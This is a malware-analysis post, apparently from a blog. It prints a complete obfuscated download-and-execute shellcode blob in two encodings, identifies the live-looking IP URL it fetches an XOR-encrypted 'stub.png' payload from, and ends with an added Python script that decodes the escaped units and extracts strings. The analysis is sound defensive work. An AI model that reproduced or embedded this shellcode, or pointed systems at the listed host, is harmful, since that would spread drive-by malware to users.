Here is the link to my earlier post.
The code that gets executed is as follows.
Data5756Data3352Data64C9Data718BData8B30Data0C76Data768BData8B1CData085EData7E8BData8B20Data8136Data0C7FData0033Data0032DataEF75Data5F5ADataE95EData0243Data0000Data8959Data00A9Data0002Data8900Data04B9Data0002Data8900Data08B1Data0002Data8B00Data8BE9Data6AFDData590CDataDDE8Data0001DataE200Data8BF9Data0055DataC283DataEB05Data5B21Data4D8DData68FBData6E6FData0000Data7568Data6C72Data546DData8B51Data55FFDataEC8BData01C6Data8968Data0159Data41C6DataC305DataE2FFDataDAE8DataFFFFData8BFFData6AD8Data5901DataA3E8Data0001DataE200Data68F9Data0100Data0000Data858DData0101Data0000DataC750Data4085Data0002Data2500Data5041DataC750Data4485Data0002Data4400Data5441DataC741Data4885Data0002Data2500Data005CData8D00Data4085Data0002Data5000Data55FFData482CData8589Data00FCData0000Data84C7Data0105Data0001Data7500Data6470DataC761Data0584Data0105Data0000Data6574Data652EData84C7Data0905Data0001Data7800Data0065Data8B00Data3055DataC283DataEB05Data5B26Data4D8DData33FBData56F6Data8D56Data0185Data0001Data5000Data458DData5034Data5156DataFF8BData8B55DataC6ECData6801Data5989DataC601Data0541DataFFC3DataE8E2DataFFD5DataFFFFData006AData8068Data0000Data6A00Data6A03Data6A00Data6801Data01FFData001FData858DData0101Data0000DataFF50Data1455DataC00BData840FData00D4Data0000Data8589Data0230Data0000Data006AData006AData006ADataFF50Data1855Data006AData858BData0230Data0000DataFF50Data2855Data8589Data0234Data0000Data006AData858DData0238Data0000Data8B50Data3485Data0002Data5000Data858DData0260Data0000Data8B50Data3085Data0002Data5000Data55FFData8D20Data60BDData0002Data8B00Data348DData0002Data8000Data0F34Data4995DataF975Data3780Data6A95Data6A00Data6A00Data8B00Data3085Data0002Data5000Data55FFData6A18Data8D00Data3885Data0002Data5000Data858BData0234Data0000Data8D50Data6085Data0002Data5000Data858BData0230Data0000DataFF50Data2455Data858BData0230Data0000DataFF50Data1C55Data558BData8308Data05C2Data33EBData8D5BDataFB4DData8B56DataFC85Data0000DataC600Data0085Data0001Data2200Data84C6Data0B05Data0001Data2200Data858DData0100Data0000Data5150
DataFF8BData8B55DataC6ECData6801Data5989DataC601Data0541DataFFC3DataE8E2DataFFC8DataFFFFDataAD8BData0200Data0000DataBD8BData0204Data0000DataB58BData0208Data0000DataE58BDataC033Data335DDataC3DBData5551Data738BData8B3CData1E74Data0378Data56F3Data768BData0320Data33F3Data49C9DataAD41DataC303DataED33DataBE0FData3A10Data74D6DataC108Data07CDDataEA03DataEB40Data3BF1Data752FData5EE7Data6E8BData0324Data66EBData4C8BData004DData6E8BData031CData8BEBData8D44Data0300DataABC3Data595DDataE8C3DataFDB8DataFFFFData7432Data0C91DataE239Data837DData2F51Data01A2Data65A0DataCB97Data8963Data4FD1Data3293Data94E4DataBE43DataDBACData6657DataFF0DData36B2Data130FData8DC4Data741FData138EDataAC0AData730DDataFD1BDataD680Data9AAFData7468Data7074Data2F3AData312FData322EData3433Data382EData2E33Data3137Data642FData7461Data6461Data7461Data6461Data7461Data6461Data7461Data6461Data7461Data2F61Data7473Data6275Data702EData676EData0000Data0000
Decoding it gives the following code.
%u5756%u3352%u64C9%u718B%u8B30%u0C76%u768B%u8B1C%u085E%u7E8B%u8B20%u8136%u0C7F%u0033%u0032%uEF75%u5F5A%uE95E%u0243%u0000%u8959%u00A9%u0002%u8900%u04B9%u0002%u8900%u08B1%u0002%u8B00%u8BE9%u6AFD%u590C%uDDE8%u0001%uE200%u8BF9%u0055%uC283%uEB05%u5B21%u4D8D%u68FB%u6E6F%u0000%u7568%u6C72%u546D%u8B51%u55FF%uEC8B%u01C6%u8968%u0159%u41C6%uC305%uE2FF%uDAE8%uFFFF%u8BFF%u6AD8%u5901%uA3E8%u0001%uE200%u68F9%u0100%u0000%u858D%u0101%u0000%uC750%u4085%u0002%u2500%u5041%uC750%u4485%u0002%u4400%u5441%uC741%u4885%u0002%u2500%u005C%u8D00%u4085%u0002%u5000%u55FF%u482C%u8589%u00FC%u0000%u84C7%u0105%u0001%u7500%u6470%uC761%u0584%u0105%u0000%u6574%u652E%u84C7%u0905%u0001%u7800%u0065%u8B00%u3055%uC283%uEB05%u5B26%u4D8D%u33FB%u56F6%u8D56%u0185%u0001%u5000%u458D%u5034%u5156%uFF8B%u8B55%uC6EC%u6801%u5989%uC601%u0541%uFFC3%uE8E2%uFFD5%uFFFF%u006A%u8068%u0000%u6A00%u6A03%u6A00%u6801%u01FF%u001F%u858D%u0101%u0000%uFF50%u1455%uC00B%u840F%u00D4%u0000%u8589%u0230%u0000%u006A%u006A%u006A%uFF50%u1855%u006A%u858B%u0230%u0000%uFF50%u2855%u8589%u0234%u0000%u006A%u858D%u0238%u0000%u8B50%u3485%u0002%u5000%u858D%u0260%u0000%u8B50%u3085%u0002%u5000%u55FF%u8D20%u60BD%u0002%u8B00%u348D%u0002%u8000%u0F34%u4995%uF975%u3780%u6A95%u6A00%u6A00%u8B00%u3085%u0002%u5000%u55FF%u6A18%u8D00%u3885%u0002%u5000%u858B%u0234%u0000%u8D50%u6085%u0002%u5000%u858B%u0230%u0000%uFF50%u2455%u858B%u0230%u0000%uFF50%u1C55%u558B%u8308%u05C2%u33EB%u8D5B%uFB4D%u8B56%uFC85%u0000%uC600%u0085%u0001%u2200%u84C6%u0B05%u0001%u2200%u858D%u0100%u0000%u5150%uFF8B%u8B55%uC6EC%u6801%u5989%uC601%u0541%uFFC3%uE8E2%uFFC8%uFFFF%uAD8B%u0200%u0000%uBD8B%u0204%u0000%uB58B%u0208%u0000%uE58B%uC033%u335D%uC3DB%u5551%u738B%u8B3C%u1E74%u0378%u56F3%u768B%u0320%u33F3%u49C9%uAD41%uC303%uED33%uBE0F%u3A10%u74D6%uC108%u07CD%uEA03%uEB40%u3BF1%u752F%u5EE7%u6E8B%u0324%u66EB%u4C8B%u004D%u6E8B%u031C%u8BEB%u8D44%u0300%uABC3%u595D%uE8C3%uFDB8%uFFFF%u7432%u0C91%uE239%u837D%u2F51%u01A2%u65A0%uCB97%u8963%u4FD1%u3293%u94E4%uBE43%uDBAC%u6657%uFF0D%u36B2%u130F%u8DC4%u741F%u138E%uAC0A%u730D%uFD1B%uD680%u9AAF%u7468%u7074%u2F3A%u312F%u322E%u3433%u382E%u2E33%u3137%u642F%u7461%u6461%u7461%u6461%u7461%u6461%u7461%u6461%u7461%u2F61%u7473%u6275%u702E%u676E%u0000%u0000
Analyzing it further, it turns out to be code that downloads a png file from the following address.
http://1.234.83.71/datadatadatadatadata/stub.png
The contents are XOR-encrypted, so I will need to look at it a bit more, but since it is download-and-execute code,
it looks certain to be malware.
After decrypting it I will run it through antivirus.
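The step the post performs by hand, turning the %uXXXX string into the bytes it occupies in memory and reading the URL out of the tail, can be reproduced statically. The following is an added example (editor's code, not the poster's); it decodes either the "%uXXXX" form or the "DataXXXX" form quoted above (both carry one 16-bit unit per token, stored little-endian as JavaScript's unescape() would), then pulls printable strings and URLs out of the result the way the strings utility would. The embedded sample is only the last 26 units of the blob in the post, which is where the URL sits; the rest of the shellcode is deliberately not included.

```python
import re

# One token = one 16-bit unit, in either of the two spellings quoted in the post.
_TOKEN = re.compile(r"(?:%u|Data)([0-9A-Fa-f]{4})")

# Sample input: the final 26 units of the blob shown in the post (the URL tail).
SAMPLE_TAIL = (
    "%u7468%u7074%u2F3A%u312F%u322E%u3433%u382E%u2E33%u3137%u642F"
    "%u7461%u6461%u7461%u6461%u7461%u6461%u7461%u6461%u7461%u2F61"
    "%u7473%u6275%u702E%u676E%u0000%u0000"
)


def decode_u16_units(text: str) -> bytes:
    """Decode %uXXXX / DataXXXX tokens into raw bytes.

    JavaScript's unescape() turns each %uXXXX into one UTF-16 code unit, which
    a 32-bit x86 process stores little-endian. So %u7468 becomes the two bytes
    68 74, i.e. the ASCII text "ht"; that byte swap is why the URL reads
    backwards in pairs in the escaped form.
    """
    out = bytearray()
    for unit_hex in _TOKEN.findall(text):
        unit = int(unit_hex, 16)
        out.append(unit & 0xFF)   # low byte first
        out.append(unit >> 8)     # high byte second
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable ASCII of at least min_len bytes (like `strings`)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def find_urls(data: bytes) -> list[str]:
    """http(s) URLs embedded in the decoded bytes; NUL terminators end them."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", data)]


def analyze(text: str) -> dict:
    """Summarise an escaped blob: decoded size, readable strings, and URLs."""
    data = decode_u16_units(text)
    return {
        "length": len(data),
        "strings": printable_strings(data),
        "urls": find_urls(data),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_TAIL)
    print(f"{report['length']} bytes decoded")
    for s in report["strings"]:
        print("string:", s)
    for u in report["urls"]:
        print("url:   ", u)
```

Because the post's "DataXXXX" listing and the "%uXXXX" listing are the same units under a different prefix, decoding both forms yields identical bytes, which is a quick way to confirm the manual transcription in the post. The same decoder can be pointed at the whole blob to recover any other plaintext strings (library names, export names) the loader carries.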